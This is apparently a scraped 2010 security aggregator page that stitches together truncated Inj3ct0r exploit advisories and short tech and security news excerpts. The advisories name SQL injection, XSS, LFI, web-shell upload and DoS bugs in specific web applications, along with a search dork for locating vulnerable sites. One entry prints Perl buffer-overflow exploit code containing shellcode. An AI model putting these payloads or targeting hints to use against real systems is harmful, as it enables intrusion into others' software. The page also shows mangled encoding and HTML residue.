Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Rnews Feed Aggregator v1.01 (search/index) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================================
Rnews Feed Aggregator v1.01 (search/index) SQL Injection Vulnerability
======================================================================
Scriptname…….: Rnews v1.01
Scriptpage…….: http://rnews.sourceforge.net
Scriptdownload…: http://sourceforge.net/projects/rnews/files/rnews/
Category………: Webapps/0day
Bug-Author…….: Bloodman
Bug-Published….: 30.06.2010
Bug-Reported…..: 30.06.2010 (reported to the coder)
Bug-Fixxed…….: No
Security-Risk….: Medium
Vulnerability….: Some SQL-Injections
Dork-Information.: allinurl:&quot;rnews&quot;
Bug-Information..: search.php and index.php
Vulnerable-Files.:
http://localhost.com/rnews/search.php?q=[SQL]
http://localhost.com/rnews/index.php?view=[SQL]
====================================================================================
Greets………..: Inj3ct0r, apu, [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla joomproperty XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================
Joomla joomproperty XSS Vulnerability
=====================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ES Simple Uploader v 1.1 =&gt; upload shell Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
ES Simple Uploader v 1.1 =&gt; upload shell Vulnerability
======================================================
##########################################
#[+] Date: 30/06/2010
#[+] Author: MeGo
#[+] Tested ON :windows xP
#[+] MY Team : Team Hacker Egypt
#[+] Email: M3GO@live.com
#[+] CategorY : Webapps/0day [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/ARM – Disable ASLR Security – 102 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================
linux/ARM – Disable ASLR Security – 102 bytes
=============================================
/*
Title: Linux/ARM – Disable ASLR Security – 102 bytes
Date: 2010-06-20
Tested: Linux ARM9 2.6.28-6-versatile
Author: Jonathan Salwan
Web: http://shell-storm.org | [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Mini-Stream RM-MP3 Converter v3.1.2.1 Buffer Overflow Exploit (SEH)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================================
Mini-Stream RM-MP3 Converter v3.1.2.1 Buffer Overflow Exploit (SEH)
===================================================================
#http://www.mini-stream.net/downloads/Mini-streamRM-MP3Converter.exe
#By Madjix Dz8[at]hotmail[dot]com
#Greets: *Volc4n0 alone*
my $shellcode= &quot;xdbxc0×31xc9xbfx7cx16×70xccxd9×74×24xf4xb1&quot; .
&quot;x1ex58×31×78×18×83xe8xfcx03×78×68xf4×85×30&quot; .
&quot;x78xbcx65xc9×78xb6×23xf5xf3xb4xaex7dx02xaa&quot; .
&quot;x3ax32×1cxbfx62xedx1dx54xd5×66×29×21xe7×96&quot; .
&quot;x60xf5×71xcax06×35xf5×14xc7×7cxfbx1bx05×6b&quot; .
&quot;xf0×27xddx48xfdx22×38×1bxa2xe8xc3xf7×3bx7a&quot; .
&quot;xcfx4cx4fx23xd3×53xa4×57xf7xd8×3bx83×8ex83&quot; .
&quot;x1fx57×53×64×51xa1×33xcdxf5xc6xf5xc1×7ex98&quot; .
&quot;xf5xaaxf1×05xa8×26×99×3dx3bxc0xd9xfex51×61&quot; .
&quot;xb6×0ex2fx85×19×87xb7×78×2fx59×90×7bxd7×05&quot; .
&quot;x7fxe8×7bxca&quot;;
my $jnk=&quot;x41&quot; x 43488 ;
my $nseh=&quot;xebx06×90×90&quot; [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_myblogcontroller LFI Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Joomla Component com_myblogcontroller LFI Vulnerability
=======================================================
[?] My h0m3: [http://HaCkTeCh.Org/cc&amp; Pal-Li0n.som [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>InteRa CMS (index.php) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================================
InteRa CMS (index.php) Blind SQL Injection Vulnerability
========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ArgoWeb Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
ArgoWeb Blind SQL Injection Vulnerability
=========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator
=========================================================
###########################################################################
###########################################################################
######## SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator ########
###########################################################################
# Vulnerability Detection [...]

A divorced mother of three in Seattle, K.S. opened her email one day and found a message from a stranger. â??Read This and Be Smart,â? it said. When K.S. opened the email she found, to her horror, a sexually explicit photoâ??of herself.
The accompanying note was nothing less than blackmail: â??This is what I want: a [...]

Strathclyde Police from Glasgow, UK, was compelled to shut down its website because of the fear of virus attack from Chinese hackers.
The website was shut down in order to enable the IT department of Strathclyde Police to examine the threat after some web links appearing on the website redirecting users to a website known for [...]

A data breach of computers at the University of Maineâ??s counseling center allowed hackers to access not only the Social Security numbers and dates of birth of students and alumni who have sought its services in the past eight years but clinical information as well.
Students or former students who visited the counseling center between Aug. [...]

I’m often asked how many enterprise admins â?? the most privileged users on a Windows network â?? a company should have. The answer is straightforward enough: the bare minimum. Doling out that type of power willy-nilly is a great way to expose your systems to attacks. In fact, the No. 1 way to minimise overall [...]

Femtocells sound vaguely like a cross between a Feynman diagram and a biology class, but they’re the latest piece of gear that millions of people will soon want in their homes without having missed them before. A femtocell is a small cellular base station designed to provide superior, short-range, indoor cellular coverage in a home [...]

Documents recently unsealed in a three-year old court case against Dell Computer indicated that the company sold millions of computers with faulty parts, knowing full well that the components inside were faulty.
First reported by the New York Times, the computers were sold in a two-year period from 2003 to 2005, and were sold to educational [...]

It looks like Steve Jobs is no longer alone in his crusade to rid the world of Adobe’s video player software Flash, as the adult video industry turns towards the open HTML5 standard.
Conceivably Tech has spoken to the founder of web porn giant Digital Playground (DP) who reckons his company will be dropping Flash like [...]

One of the most popular topics regarding the new iPhone 4 is the reception issues a number of people have mentioned that seem to be exacerbated by hand placement on the device. While Apple currently suggests avoiding certain hand positions or using a case, there is a new report that suggests a possible fix for [...]

In a blog post on Monday, Barbara Gordon, who heads Microsoft’s customer service and support, argued that her company’s offerings beat Google’s hands down.
"The launch of Office 2010 earlier this month reminded me just how much this makes us different," Gordon said. "When was the last time you called Google for help recovering a lost [...]

Sony has released the new system software update v3.04 for its PlayStation 3 (PS3) games console.
The update will bring Facebook integration to the console, as well as launching Sony’s new premium PlayStation Network (PSN) service, PlayStation Plus.
The Facebook for PS3 application will allow users to integrate their PSN profiles with their Facebook profiles, allowing them [...]

After two years of job cuts to reduce operating expenses, Dell Inc. is now shifting gears to hire 5,000 sales workers to bolster the marketing of its enterprise solutions.
The 45 percent increase in sales people over three years is part of Round Rock-based Dellâ??s (Nasdaq: DELL) plan to double its data center business by selling [...]